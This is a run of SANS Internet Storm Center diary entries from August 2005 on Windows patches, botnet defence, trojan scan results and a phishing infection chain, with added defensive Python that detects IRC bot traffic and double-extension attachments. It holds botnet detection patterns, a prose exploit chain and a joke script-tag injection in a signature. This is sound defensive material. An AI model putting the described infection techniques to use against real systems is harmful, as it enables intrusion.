Update: Minutes prior to posting this, proof of concept code for the last of the three vulnerabilities covered under the 038 banner went public. Hope you're patched, or using something other than IE. ;)

MS05-039: Arbitrary code execution vulnerability in Plug and Play

Severity: Critical


Affected Software:

* 2000 SP4

* XP, all Service Packs & platforms

* 2003, all Service Packs & platforms

MS05-039 fixes a vulnerability in Plug and Play which can be exploited to run arbitrary code. The risk presented by this vulnerability varies across different versions of Windows.

* On XP Service Pack 2 and 2003 Server systems, the vulnerability is ONLY exposed to an attacker logged on to the system locally.

* On XP Service Pack 1, the vulnerability is ALSO exposed to remote users with valid logon credentials.

* On Windows 2000 SP4 systems, this vulnerability can ALSO be exploited by anonymous attackers. A valid login is not required.

Handler chatter:

Users shouldn't face too much external exposure, as the exploitation vector in this case is the old Microsoft standard (TCP 139 & 445), but internal networks could be at risk. Based on the language in the bulletin and the X-Force alert, this vulnerability is a standard stack-based buffer overflow. Exploitation is described in the X-Force alert as "trivial."

MS05-040: Arbitrary code execution vulnerability in Windows Telephony Service

Severity: Important


Affected Software:

* 2000 SP4

* XP, all Service Packs & platforms

* 2003, all Service Packs & platforms

MS05-040 fixes a vulnerability in the Windows Telephony Service which can be remotely exploited to run arbitrary code. On 2000 Professional and XP (i.e. Microsoft's 'non-server' systems) this vulnerability is limited to a local privilege escalation. On Microsoft's server operating systems that are not actively running this service, it is likewise limited to a local privilege escalation. On Server 2003 the vulnerability is only exposed to authenticated users. This leaves 2000 Server as the most exposed in this case.

Handler chatter:

Since this vulnerability occurs in the Telephony Application Programming Interface (TAPI), many third party applications may be making use of this service without the user's or administrator's explicit knowledge. The service can be started by a non-privileged user. According to the bulletin, TAPI is used for any number of voice, data, and video communications, including but not limited to teleconferencing, caller-id features, voice mail, and more. Anyone using Windows-based software to perform any of these functions should probably place this one higher on the priority stack.

MS05-041: Denial of Service Vulnerability in Remote Desktop/Remote Assistance

Severity: Moderate


Affected Software:

* 2000 SP4

* XP, all Service Packs & platforms

* 2003, all Service Packs & platforms

This update resolves a newly-discovered, privately-reported vulnerability. A vulnerability in the Remote Desktop Protocol (RDP) exists that could allow an attacker to cause a system to stop responding. The vulnerability is documented in the “Vulnerability Details” section of this bulletin.

Handler chatter:

MS labels this as moderate because the remote desktop service (RDP, or Terminal Services) is not enabled by default. However, many admins enable RDP for administration, and remote assistance requests expose this service until the request expires, making the application of this patch essential for most environments. Additionally, there are circumstances where RDP is enabled by default; for example, in Media Center Editions of XP.

There was
on this back in early July when this was released; at the time the POC code was not public, though it is public now. There was some chatter on the indicating that this could possibly be leveraged into an exploit, but the nuances of Windows kernel exploitation are out of the reach of all but the Most High Hackers. eEye came out several weeks ago and nothing more. Who's right? Who knows. If it's not just a DoS, it wouldn't be the first time an "unexploitable" DoS had been exploited.

MS05-042: Kerberos vulnerabilities

Severity: Moderate


Affected Software:

* 2000 SP4

* XP, all Service Packs & platforms

* 2003, all Service Packs & platforms

Kerberos hitchhikes onto every Windows Active Directory domain; it's not something optionally installed.

Microsoft dubbed the answer to all security bulletin 'Vulnerabilities in Kerberos could allow denial of service, information disclosure and spoofing'.

This is actually two vulnerabilities in one package deal:
and .


Microsoft rates it as medium and states the worst thing that could happen is that the Active Directory domain would stop authenticating users. It seems to involve a well-aimed packet at the domain controller, causing it to reboot after a one-minute countdown.

Valid user credentials are required and windows 2000 and 2003 servers are affected.

Now, we don't want the earth to get leveled, but neither do we want the users whining about not being able to log in, do we? Add to that that rebooting servers is a real pain as well.

Shielding TCP and UDP port 88 from hostile networks might help till you get your towel and apply the patch.


If you use smart cards in your domain, it would mean you value security enough to deploy two-factor authentication. As such, you're unlikely to really appreciate some monkey-in-the-middle type attack that can happen if you have enabled smart card technology the

The impact can be very broad, as the attacker (who needs a valid account with a smart card) gains the rights of other users.

Hence this really is for you if you use smart cards to authenticate your users on your windows domain.

Note: The Vogons point out there are no workarounds known to them, we'll take their word for it.

MS05-043: Vulnerability in Print Spooler Service Could Allow Remote Code Execution

Severity: Critical


Affected Systems:

* 2000 SP 4

* XP SP1 & 2 (32-bit)

* Server 2003 & Server 2003 (Itanium) w/o service packs.


This patch addresses a buffer overflow in the print spooler service, which is spoolsv.exe. For Windows 2000 and Windows XP SP1, any anonymous user could attempt to exploit this vulnerability. For Windows XP SP2 and Windows Server 2003, the user would need to be authenticated.

Thanks to helpful handlers!

The diary is usually a collaborative effort, but on MS Patch Day, the collaboration reaches a new level. I'd like to thank all of the handlers for their assistance today - I'd rattle off a litany of names, but you know who you are. Thanks!

Opportunities squandered

Astute readers may have noticed my absence from diary duties of late. I've been traveling and training all over the damn place for what seems like forever, and I had planned on doing a write-up on my most recently attended event, the week-long blur known as BlackHat/DEFCON, but I mistakenly volunteered to take the hotseat on the second Tuesday of the month. My thrilling tales will have to wait for another day, intrepid fans, but rest assured, thrilling tales they be!

Until that day, happy patching!


Cory Altheide


Handler On Duty


Mistook their nods for an approval

Just ignore the smoke and smile

* Just so you don't miss it, make sure to check out Handler William Salusky's
Published: 2005-08-08

Deep Rants; CYA from botnets to phisherZ ; Malware Acquisition postponed

Deep Rants

It's a pitiful state of affairs. That is, balancing the day job with the vain attempt to keep one's finger on the pulse of the net consisting of limited reports sourcing from the minority of security clueful. It's sad to say but today is not much different, it's more of the same; bots, spam, phish, malicious code, those who fall for it, compromised hosts at non-responsive hosting providers, dev-nulled abuse mailboxes, open egress/ingress policies, SNMP foolishness, lack of validation before publication, *BREATHE*, AntiVirus updates without technical detail, unenforced AUPs, nonexistent AUPs, identity theft, corporate information loss, SOX and HIPAA violations, false positives, zero patch management and mailing list FUD... And No, I'm not Denis Leary.
Seriously. I can't address every issue that I rant about, but I've selected one that I deal with frequently.

CYA - Protecting your corporate "assets"

In addition to handler status, I'm a member of a response team that frequently handles corporate network incident response involving malicious code... namely bots. We have a short list of mitigations that resonate in every incident and find that implementation of these risk mitigators can go a long way toward reducing if not preventing future outbreaks. These protective measures are not exhaustive, but can be deployed at a higher tier in your architecture further removed from managing the host level. I'm not going to talk about workstation security policies, or the gimme of running up to date and active AntiVirus products, and no reference will be given to running host level application firewalls.

What can be done?

Centralize network egress

If you haven't already consolidated your access to the Internet, fighting the botnet fight will be that much harder if your networks have many paths to the public Internet at large.

Employ egress filtering

Block everything going out to the world that is unnecessary for business. Policies are a good candidate for a new bullet point, so if you don't have them currently in place, develop them. Do you connect to Windows file shares on the net? Block outbound access. Do you tftp gets and puts to the net? Block outbound access. Better yet, start from scratch and block everything: establish your minimum outbound networking requirements, allow just that, and require all new connectivity to navigate an access request process. Force web traffic through restrictive proxy servers; arbitrary outbound TCP port 80 and 443 is a nightmare waiting to happen, or maybe just waiting for you to discover.

Centralize your logging

Without easy access to logging from firewalls, VPN concentrators and other network devices, finding the threat from within becomes unnecessarily complicated. If you have identified a botnet controller on the net, you can quickly build a map of compromises on your network by identifying all connections to the malicious host(s). You can also identify possible second-stage payload infections through the analysis of connections from infected hosts to Internet destinations shared by the whole of your infection base.

Deploy intrusion sensors

Finding the traditional IRC-based botnet with intrusion sensor technology is easy and unending fun. Really. Unending fun. HTTP- and UDP-based bots get a bit trickier but are not impossible to detect; for time and space I'm not going to get into that at this moment. I personally love to watch IRC "JOIN" and "PRIVMSG" sensor alerts. You of course should modify your signatures to look for IRC communication on ALL ports, not just the IRC default ports; many botnet operators choose TCP ports including 443, 5190, 8080 and potentially anywhere in the 64K range for managing their botnets. Come to think of it, I don't think I've seen a port 0 botnet controller. :)

Establish flexible routing control

You should have strong control of your horizontal as well as your vertical. Once a malicious controller has been identified, cut off access to it by advertising a null route across your network to make short work of it; this provides some breathing room for your people on the street who have the problem of physical access involved in malware response. If you have absolute remote administrative control of every node on your network, it's that much better for you. With additional network routing tricks instead of null routing, you can control the traffic path and get into some more complicated but very exciting areas of sinkholing and honeynet technology, which I'm very passionate about. However, I'm not opening that can of worms in this forum, given the complexity and legal issues that I'm sure many would be quick to offer me an earful about.

DNS - Blackholes, Poisoning and Reporting

Botnet control is a mobile threat. If you have control of your DNS infrastructure, you can protect your networks by intentionally poisoning "your" internal resolvers. You can establish zone files for known malicious botnet controller hostnames; that would effectively prevent botnet-herding miscreants from regaining control of any botted hosts on your network through the update of DNS records, which could otherwise evade your null route on any previously known botnet controller IP by, for EXAMPLE, simply pointing the DNS A record for badbot.botcontroller.net to
Control of DNS makes sinkholing your botted infrastructure a trivial task. It's worth mentioning that if you have the ability to take control of IP on your network, dynamic DNS hosting providers have seemingly taken to using that IP as the blackhole for DNS records used primarily in the control of bots. If you log queries, you can determine the DNS A records behind the IP you discovered bots connecting to. If you can't enable full logging, investigate the possibility of employing passive DNS query logging, which will not provide you with a one-to-one match of client request to hostname query but can still provide historical IP-to-name record matches.
I imagine some folks will be a little bit miffed regarding the lack of technical and how-to detail in the above statements, but I'm expecting that we'll be able to expand and dive into detail for the specific topics listed above in future diaries. This is just the starting point.
With a little bit of help I'm sure we could make this a minimum of a top 10 list for botnet fighting strategies. Help us flesh it out, you are welcome to provide us with some examples of what you do to actively protect your networks from botnets and the random, ever present malicious code threat.
-With Respect and tribute to Carl Douglas, "Everybody was BotNet Fighting...".
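As an added example of what the logging, sensor and second-stage items above look like in practice (this is not code from William's diary or any ISC tool), here is a small Python triage script over constructed firewall lines and constructed sensor payload captures. The controller address 203.0.113.9 and every host and payload in it are made-up documentation values. It maps which internal hosts talked to a known controller, intersects those hosts' other destinations to surface a candidate second-stage server, and flags IRC commands in captured streams regardless of destination port.

```python
"""Botnet triage over constructed firewall and sensor records.

Added example; not code from the ISC diary. All hosts, addresses and
payloads below are constructed for illustration.
"""
import re
from collections import defaultdict

# Constructed firewall log (documentation addresses, fabricated hosts).
FIREWALL_LOG = """\
Aug 08 10:01:02 fw1 accept src=10.0.5.17 dst=203.0.113.9 dport=443 proto=tcp
Aug 08 10:01:05 fw1 accept src=10.0.5.17 dst=198.51.100.20 dport=80 proto=tcp
Aug 08 10:02:11 fw1 accept src=10.0.7.42 dst=203.0.113.9 dport=443 proto=tcp
Aug 08 10:02:14 fw1 accept src=10.0.7.42 dst=198.51.100.20 dport=80 proto=tcp
Aug 08 10:03:30 fw1 accept src=10.0.9.3 dst=192.0.2.77 dport=80 proto=tcp
Aug 08 10:04:01 fw1 accept src=10.0.9.3 dst=198.51.100.20 dport=80 proto=tcp
Aug 08 10:05:45 fw1 accept src=10.0.5.17 dst=198.51.100.20 dport=80 proto=tcp
"""

# Controller address you already identified (constructed value).
KNOWN_CONTROLLERS = {"203.0.113.9"}

# Constructed sensor captures: (destination port, first bytes of the stream).
# Note the IRC session on 443: the port alone tells you nothing.
PAYLOADS = [
    (6667, b"NICK bot-2f9a\r\nUSER x 0 * :x\r\nJOIN #herd secret\r\n"),
    (443, b"NICK bot-2f9a\r\nJOIN #herd\r\nPRIVMSG #herd :!status\r\n"),
    (443, b"\x16\x03\x01\x00\x8a\x01\x00\x00\x86\x03\x01"),  # TLS ClientHello prefix
    (8080, b"GET / HTTP/1.1\r\nHost: www.example.com\r\n\r\n"),
]

LOG_RE = re.compile(r"src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+)")
# IRC client commands at the start of a line, whatever the port.
IRC_CMD_RE = re.compile(rb"^(NICK|USER|PASS|JOIN|PRIVMSG) ", re.M)


def parse_log(text):
    """Yield (src, dst, dport) for every firewall line that matches LOG_RE."""
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if m:
            yield m["src"], m["dst"], int(m["dport"])


def map_infections(log_text, controllers):
    """Internal hosts that connected to a known controller: the infection base."""
    return {src for src, dst, _ in parse_log(log_text) if dst in controllers}


def shared_destinations(log_text, infected, controllers):
    """Destinations every infected host contacted, minus the controllers
    themselves: candidates for a second-stage payload server."""
    seen = defaultdict(set)
    for src, dst, _ in parse_log(log_text):
        if src in infected:
            seen[src].add(dst)
    if not infected:
        return set()
    return set.intersection(*(seen[h] for h in infected)) - set(controllers)


def irc_commands(payload):
    """IRC commands found at line starts in a captured stream."""
    return [m.group(1).decode() for m in IRC_CMD_RE.finditer(payload)]


def irc_alerts(captures):
    """(dport, commands) for every capture that carries IRC commands."""
    alerts = []
    for dport, payload in captures:
        cmds = irc_commands(payload)
        if cmds:
            alerts.append((dport, cmds))
    return alerts


if __name__ == "__main__":
    botted = map_infections(FIREWALL_LOG, KNOWN_CONTROLLERS)
    print("botted hosts:", sorted(botted))
    print("shared second-stage candidates:",
          sorted(shared_destinations(FIREWALL_LOG, botted, KNOWN_CONTROLLERS)))
    for dport, cmds in irc_alerts(PAYLOADS):
        print(f"IRC on port {dport}: {' '.join(cmds)}")
```

In the constructed log, 10.0.9.3 also reaches 198.51.100.20 without ever touching the controller, which is the reason the shared-destination list is a starting point for analysis rather than a verdict; against real logs you would baseline it against what uninfected hosts contact. Point the two regexes at your own firewall and sensor formats and the rest carries over.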

Malware Response - part 2 postponed

In my last diary (http://isc.sans.org/diary.php?date=2005-06-13) I mentioned that in my next diary (the one you are reading) I would offer response techniques leveraging the use of SBD as a malware acquisition tool. Well, I didn't really want to be called a liar, but I've earned the title. Next diary, I will most definitely provide at least a brief procedure that is by no means perfect when it comes to identifying every case of infectious/malicious code, but in my experience and the thousands of machines I've investigated, only a handful of hosts required any closer inspection to acquire malicious code samples. BTW, we haven't received any reader input on remote command line response techniques, so I have to imagine it must be that you forgot to hit send on that draft email. It's okay, don't be shy. Go back to your drafts folder and hit send. Everybody's doing it.

William Salusky

wsalusky at gmail dot com

Handler on Duty (heh heh...)


Published: 2005-08-07

postcard.gif.exe; virus numbers!; IE7.beta warez bugged; Black Tuesday: be prepared

Thanks Chris!

Chris sent us some packets, which fellow handler George Bakos took and discovered what looks like a weird bug in some equipment. We've notified the vendor and will follow up on it, but promised to keep it under wraps till it's appropriate to speak about it. If it turns out to be more widespread than it appears now, we might decide to act otherwise at such time.

So please, do send us weird, unexplained packets; some of us eat them for breakfast.

You'll be making the Internet a better place. This is also why Chris deserves his 5 minutes of fame.


Ian sent in the incoming email of some spam claiming to be a postcard and an analysis he did of the referenced critter.
A virustotal scan I ran later today has the usual diverse names. Moreover it gets that void look in the eye of some anti-virus software.

Scan results
File: postcard.gif.exe
Date: 08/07/2005 21:09:18 (CET)
AntiVir found [BDS/Zapchast.2]
Avast 4.6.695.0/20050805 found [Win32:Jeefo]
AVG 718/20050807 found [Win32/Hidrag.A]
Avira found nothing
BitDefender 7.0/20050807 found [Trojan.Zapchas.F]
CAT-QuickHeal 7.03/20050807 found nothing
ClamAV devel-20050725/20050807 found [W32.Jeefo]
DrWeb 4.32b/20050807 found [Win32.HLLP.Jeefo.36352]
eTrust-Iris found nothing
eTrust-Vet found nothing
Fortinet found [IRC/Zapchast.4D53-bdr]
F-Prot 3.16c/20050805 found nothing
Ikarus found nothing
Kaspersky found [Backdoor.IRC.Cloner.ae]
McAfee 4551/20050805 found [Generic component]
NOD32v2 1.1187/20050805 found [IRC/Cloner.AS]
Norman 5.70.10/20050805 found nothing
Panda 8.02.00/20050807 found [W32/Jeefo]
Sophos 3.96.0/20050807 found [W32/Jeefo-A]
Sybari 7.5.1314/20050807 found [Backdoor.IRC.Cloner.ae]
Symantec 8.0/20050806 found nothing
TheHacker found [Trojan/Downloader.IstBar.gen]
VBA32 3.10.4/20050805 found [Backdoor.IRC.Zapchast]

There goes my faith in anti-virus software. Just kidding. Those folks are fighting an uphill battle that is by nature reactive as the bad guys have their tools just as we do.

So what more can you do than run a different brand of anti-virus software on the perimeter and on the desktop?

Start with user education. Some awareness training will do wonders.

Next, make sure all Windows desktops/laptops that are rolled out are set up to show the extensions of all files, so that the user does in fact have a chance to see the real name and be alarmed by the *.gif.exe once they went to that training telling them they'll get punished if they click on anything that looks like that.

Finally, try to filter messages where the formatting is such that the URL the "a" tag refers to is different from the apparent URL inside the tag. Those messages should be quarantined. Also avoid all of those double-extension attachments and downloads whenever possible into an environment that is file-extension sensitive, such as Windows.
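The two mail-side checks just described (a visible URL that differs from the real href, and double-extension attachments) as an added Python example, not code from the diary. The message it parses is constructed: the addresses are made up, 203.0.113.5 is a documentation address, and the attachment body is just the base64 of the word "dummy".

```python
"""Mail-side checks for the two tricks above: a visible URL that differs
from the real href, and double-extension attachments.

Added example; not code from the diary. The message is constructed.
"""
import email
import re
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed message: fabricated addresses, documentation host 203.0.113.5,
# and an attachment whose content is only the base64 of the word "dummy".
RAW_MESSAGE = """\
From: "Greetings" <cards@example.net>
To: someone@example.org
Subject: You have received a postcard!
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="XYZ"

--XYZ
Content-Type: text/html; charset="us-ascii"

<html><body>
<p>A friend sent you a card:
<a href="http://203.0.113.5/card.php">http://www.example.com/postcard</a></p>
<p>Or view it <a href="http://www.example.com/help">here</a>.</p>
</body></html>
--XYZ
Content-Type: application/octet-stream; name="postcard.gif.exe"
Content-Disposition: attachment; filename="postcard.gif.exe"
Content-Transfer-Encoding: base64

ZHVtbXk=
--XYZ--
"""

LOOKS_LIKE_URL = re.compile(r"^(https?://|www\.)", re.I)
# name.<short ext>.<executable ext> at the end of the file name
DOUBLE_EXT = re.compile(r"\.[a-z0-9]{1,4}\.(exe|scr|pif|com|bat|cmd|vbs|js|hta)$", re.I)


class AnchorCollector(HTMLParser):
    """Collect (href, visible text) for every <a> in an HTML body."""

    def __init__(self):
        super().__init__()
        self.anchors = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(url):
    """Hostname of a URL; bare 'www.example.com' text is treated as http."""
    if not url.lower().startswith(("http://", "https://")):
        url = "http://" + url
    return (urlparse(url).hostname or "").lower()


def mismatched_links(html):
    """Anchors whose visible text is a URL on a different host than the href."""
    p = AnchorCollector()
    p.feed(html)
    return [(href, text) for href, text in p.anchors
            if LOOKS_LIKE_URL.match(text) and host_of(text) != host_of(href)]


def risky_attachments(msg):
    """File names of the form name.ext.exe (and friends) anywhere in the message."""
    names = []
    for part in msg.walk():
        name = part.get_filename()
        if name and DOUBLE_EXT.search(name):
            names.append(name)
    return names


def triage(raw):
    """Quarantine decision for one raw RFC 822 message."""
    msg = email.message_from_string(raw, policy=policy.default)
    html = "".join(part.get_content() for part in msg.walk()
                   if part.get_content_type() == "text/html")
    links = mismatched_links(html)
    attachments = risky_attachments(msg)
    return {"mismatched_links": links, "risky_attachments": attachments,
            "quarantine": bool(links or attachments)}


if __name__ == "__main__":
    print(triage(RAW_MESSAGE))
```

Only anchors whose visible text itself looks like a URL are compared, so ordinary "click here" links do not trip the rule; the host comparison is case-insensitive and ignores scheme and path, which keeps http/https variants of the same site from being flagged. Extend DOUBLE_EXT with whatever your own gateway treats as executable.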

Virus numbers!

The thing with these differing names for a single virus, though, is simply put: why do you need them? Well, they are good for talking to somebody else. E.g. Melissa rings a bell, doesn't it? But as the example above shows, these names lead to nothing but confusion. "Yeah, I got to clean Jeefo."; "Good luck with that one, I just cleaned Zapchas." Let alone the numbering/lettering used for the variants. Once these get beyond B, it seems as if some count faster than others. This lack of sync causes people to only remember the name, not the version. But the payload, impact, clean-up, ... of a virus can be quite different between these variants, causing even more confusion.

So we could continue to argue -as customers- with our vendors and demand they synchronize it. Tried that, apparently it still doesn't work all that well in the real world, despite promises to the contrary.

The other thing with virus names is that it creates the chances for fame and glory for the author. "I wrote Mellissa" (no I didn't, but you'll get the meaning) is much more of an interesting statement at some hacker convention than "I wrote CXN-2001-0041".

So here goes my suggestion for you to like or dislike: Let's -as customers- demand that our suppliers switch to a system like the one used for vulnerabilities:

- CXN: Common eXploit Number

- CXC: Common eXploit Candidate

Once a CXN is issued, everybody switches their CXC to a CXN. A CXN is exactly one variant of one exploit (such as a virus), proven by samples kept centrally.

Let's demand the vendors fund a little 3rd party organization that keeps the numbers in sync and if they are smart they can learn to share descriptions and the like (which do cost a lot of money to produce and gain us little as to exactly who made them as long as they are good enough).

At the same time the Internet at large gets rid of the fame and glory of the authors having a recognizable hook to get their trash in the press for their 15 minutes of fame.

Yes I'm taking the step to sweep viruses/worms/trojans/... all into a single "exploit" bin. It only makes sense as it all grows to the same thing anyway.

The next logical step would be to link exploits to vulnerabilities and there you have the birth of a relational database. That database could (eventually) expand to include vendor info such as which version is vulnerable, and what patch stops the vulnerability, creating a link between e.g. the IDS seeing an exploit and the admin relaxing as he sees the patch has already been deployed site wide for the associated vulnerability, and that the anti-virus reports it stopped it as well.
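To make the proposal concrete, here is an added sketch (not something the diary, the ISC or any vendor provides) of such a registry in SQLite via Python: vendor names resolve to one candidate or number, a candidate is promoted to a CXN in one step so every alias switches together, and an exploit joins through its linked vulnerability to a host's patch state, which is the "IDS sees an exploit, admin relaxes" scenario. Every identifier of the form *-EXAMPLE-* and *-PLACEHOLDER-* is constructed; the three Jeefo names are ones the scan above reported for the same sample and are grouped here for illustration only.

```python
"""A CXC/CXN-style registry sketch in SQLite.

Added example; not the diary's or any vendor's code. Every *-EXAMPLE-* and
*-PLACEHOLDER-* identifier is constructed; the three Jeefo names are those
the scan above reported for one sample and are grouped here for illustration.
"""
import sqlite3

SCHEMA = """
CREATE TABLE exploit (
    id TEXT PRIMARY KEY,        -- CXC-... as a candidate, CXN-... once issued
    kind TEXT NOT NULL,         -- virus / worm / trojan / ...: one "exploit" bin
    description TEXT
);
CREATE TABLE alias (            -- one vendor name -> exactly one exploit
    exploit_id TEXT NOT NULL REFERENCES exploit(id),
    vendor TEXT NOT NULL,
    name TEXT NOT NULL,
    PRIMARY KEY (vendor, name)
);
CREATE TABLE vulnerability (
    id TEXT PRIMARY KEY,
    patch TEXT                  -- the patch that closes it
);
CREATE TABLE exploit_vuln (     -- which exploit uses which vulnerability
    exploit_id TEXT NOT NULL REFERENCES exploit(id),
    vuln_id TEXT NOT NULL REFERENCES vulnerability(id)
);
CREATE TABLE host_patch (       -- what the admin has deployed where
    host TEXT NOT NULL,
    patch TEXT NOT NULL,
    PRIMARY KEY (host, patch)
);
"""


def build_db():
    """In-memory registry loaded with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.execute("INSERT INTO exploit VALUES (?, ?, ?)",
                 ("CXC-EXAMPLE-0001", "virus", "candidate: file infector sample"))
    conn.executemany("INSERT INTO alias VALUES (?, ?, ?)", [
        ("CXC-EXAMPLE-0001", "Sophos", "W32/Jeefo-A"),
        ("CXC-EXAMPLE-0001", "Panda", "W32/Jeefo"),
        ("CXC-EXAMPLE-0001", "ClamAV", "W32.Jeefo"),
    ])
    conn.execute("INSERT INTO exploit VALUES (?, ?, ?)",
                 ("CXN-EXAMPLE-0002", "worm", "issued: worm using a placeholder vuln"))
    conn.execute("INSERT INTO alias VALUES (?, ?, ?)",
                 ("CXN-EXAMPLE-0002", "ExampleAV", "Worm.Placeholder.A"))
    conn.execute("INSERT INTO vulnerability VALUES (?, ?)",
                 ("VULN-PLACEHOLDER-1", "PATCH-PLACEHOLDER-A"))
    conn.execute("INSERT INTO exploit_vuln VALUES (?, ?)",
                 ("CXN-EXAMPLE-0002", "VULN-PLACEHOLDER-1"))
    conn.execute("INSERT INTO host_patch VALUES (?, ?)", ("ws-01", "PATCH-PLACEHOLDER-A"))
    conn.commit()
    return conn


def resolve(conn, vendor, name):
    """Vendor-specific name -> CXC/CXN id, or None if nobody registered it."""
    row = conn.execute("SELECT exploit_id FROM alias WHERE vendor = ? AND name = ?",
                       (vendor, name)).fetchone()
    return row[0] if row else None


def promote(conn, cxc_id, cxn_id):
    """Issue a CXN for a candidate; every vendor alias switches in one transaction."""
    with conn:
        conn.execute("UPDATE exploit SET id = ? WHERE id = ?", (cxn_id, cxc_id))
        conn.execute("UPDATE alias SET exploit_id = ? WHERE exploit_id = ?", (cxn_id, cxc_id))
        conn.execute("UPDATE exploit_vuln SET exploit_id = ? WHERE exploit_id = ?",
                     (cxn_id, cxc_id))
    return cxn_id


def vendors_missing(conn, exploit_id, vendors):
    """Vendors in the list with no name for this exploit: the 'found nothing' column."""
    have = {r[0] for r in conn.execute(
        "SELECT vendor FROM alias WHERE exploit_id = ?", (exploit_id,))}
    return sorted(v for v in vendors if v not in have)


def host_exposure(conn, host, vendor, name):
    """What the admin wants when a sensor or scanner reports a vendor name for a host."""
    exploit_id = resolve(conn, vendor, name)
    if exploit_id is None:
        return "unknown name"
    patches = [r[0] for r in conn.execute(
        "SELECT v.patch FROM exploit_vuln ev JOIN vulnerability v ON v.id = ev.vuln_id "
        "WHERE ev.exploit_id = ?", (exploit_id,))]
    if not patches:
        return "no vulnerability linked"
    applied = {r[0] for r in conn.execute(
        "SELECT patch FROM host_patch WHERE host = ?", (host,))}
    return "covered" if all(p in applied for p in patches) else "exposed"
```

The (vendor, name) primary key is what enforces the one-name-one-number rule the proposal asks for; a vendor cannot quietly point the same name at two variants. The "no vulnerability linked" answer is deliberate: a file infector like the sample above is not tied to any patch, and the database should say so rather than report a host as covered.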

In Dutch there is a saying "hoop doet leven". It is hard to translate, but literally it is something like "hope makes living". But I'm not expecting the vendors to be thrilled about it. FUD does sell products in our field.

IE7.beta warez bugged?

Microsoft is rightfully restricting downloads of IE7's beta release. This creates a market for warez versions and Craig reported that one of those was bugged with spyware. It's a big download and a big thing to search through, so it's not (yet) confirmed by us.

But the generic advice to stay away from warez is easy to make. Aside from the legalities and ethics, you do not know what you get in your hands. It might erase everything, send spam in your name, erase all network shares it has access to, ... or it might do as advertised. How will you know?
You do know you got it from people telling you they don't mind to break the law and provide you with an illegal copy of some piece of software.
Now, who do you trust?

Black Tuesday: be prepared!

Next Tuesday will be a Microsoft patch day. This will probably cause a lot of reboots throughout the world.

An anonymous reader pointed out this blog:
. It contains experiences of locked-up machines that have older APC software, which might cause them to hang during a reboot due to an expired cert in a Java runtime environment. Perhaps some preparation will safeguard you from jumping to the "blame those new patches" conclusion.

update: another anonymous reader gave us this URL from APC:
and which led us to find Sun's write-up on the issue at:

Swa Frantzen


Published: 2005-08-06

Malware URLs.

Malicious URLs

It's pretty obvious that a lot of the malware these days arrives hidden behind a URL in an e-mail or an instant message. We would like to start collecting these URLs and explore some automated methods to validate them and maybe report them.

This project is in 'pre beta' now, and any help is appreciated. The plan is to download any content from these URLs, and maybe one or two links down, run it through a virus checker for known 'bad stuff' and keep monitoring them for changes.

The URL (non malicious ;-) ) to report URLs is: http://isc.sans.org/urlcheck.php .

Things I am looking for:

- scripts to extract URLs from spam (or regular email)

- any regular expressions someone may have to look for malicious javascript
Ultimately, a list of verified malicious URLs will be made available. I also hope to release the 'check' script to distribute the checking of URLs.


Johannes Ullrich, jullrich\<script language="malicious">alert('dont spam')</script>@sans.org


Published: 2005-08-05

PHPbb Scanning; Information Leaks; Usenix Paper

PHPbb Scanning

In a to our forum, Andy Green reports observing a new version of the good old phpBB
highlight exploit. In this case the observed pattern is:


which looks like an attempt to just check quickly if the forum is vulnerable.
The attack is only effective against phpBB version 2.0.15. The current version is 2.0.17.

In a follow-up post, Sadie suggests blocking the sources from which these attacks originate via a .htaccess file. Evidently, the scans can amount to a DoS attack due to their frequency.

How to respond to Information Leaks

We received two very similar requests for help. In the first case, a user reports that they repeatedly received medical information from strangers via FAX due to a misdialed number.

Clearly, medical information is regulated by HIPAA. For fax machines, common implementation guidelines suggest programming frequently used numbers into the fax machine's speed dial memory. In addition, all fax transmissions should include a confidentiality notice asking the receiver to notify the sender and destroy the fax if it is misdirected.

In this particular case, the user notified the health care provider, but the fax errors continued. For persistent cases like this, it may be necessary to notify the individuals whose information you received, or to inform local law enforcement.

The second case involved a user who received a scanned image of a check from an insurance company. The check was one he had written to the insurance company. His account number was visible and the e-mail was not encrypted.

Obviously, this is not a good idea. The user further asked if it is necessary to get a new bank account. While possible, it is unlikely that the information leaked. It is probably not worth the effort to change accounts. However, it is advisable to review statements carefully even without such an incident.

Usenix paper

Congratulations to John Bethencourt, Jason Franklin and Mary Vernon for their award-winning paper on mapping of Internet sensors. A couple of people asked how this affects DShield; I summarized a response in a quick blog entry at
http://johannes.homepc.org/blog .


Johannes Ullrich, SANS Institute

(Filling in for George Bakos)


Published: 2005-08-04

Email Ploy;Cisco Password Leak Source;Cisco CCO Password Reset Reply-To Spoof Concern;Patch Tuesday Preview;Windows 2000 SP4 Rollup 1 Re-Release

Email Ploy

[Brought to you by Lorna Hutcheson and Tom Liston]

We received several reports of an email circulating with links to a news article that came with a surprise if you followed the links. DO NOT GO TO THE FOLLOWING LINKS or any others from this site that may be sent to you!!!

Each of the emails seems to have different links in them, but associated with the same site.

The subject of the email is "Iraq Bombinng - 140 marines killed" or something similar to it. Yes, the misspellings are from the actual email, and there are many other discrepancies and misspellings in the version that we have seen. We received several reports but only one person sent the actual email to look at. The misspellings alone are a big indicator that something is not right. If you follow the links you get taken to a news article that has obviously been modified and pieced together. For example, it says 140 Marines were killed; however, the actual news article found by googling for it has 14 as the number killed. (Not in any way making light of the numbers or the loss, just pointing out the discrepancy.)

Once you click on the link, you get their news article, but you also set off a series of events that require no interaction from the

First off, there is an exploit on the page that takes advantage of MS05-001 (Vulnerability in HTML Help Could Allow Code Execution), which is just another cross-domain scripting vulnerability. This allows them to fetch a file called ppp.hta from their website, which is then launched on your local hard drive. This then creates a file called netlog.exe, which appears to be launched on your local hard drive by using a combination of an ActiveX FileSystemObject and shell. Netlog.exe then goes and gets another file called win32sba.exe, which is a Robobot variant. Now your system can be used for whatever malicious intent the folks who set this scheme up had in mind.

The moral of this story is......Don't follow the link!!!!!

[Note: The above was updated to fix an error in our analysis. Thanks to Juergen Schmidt for pointing out our mistake.]

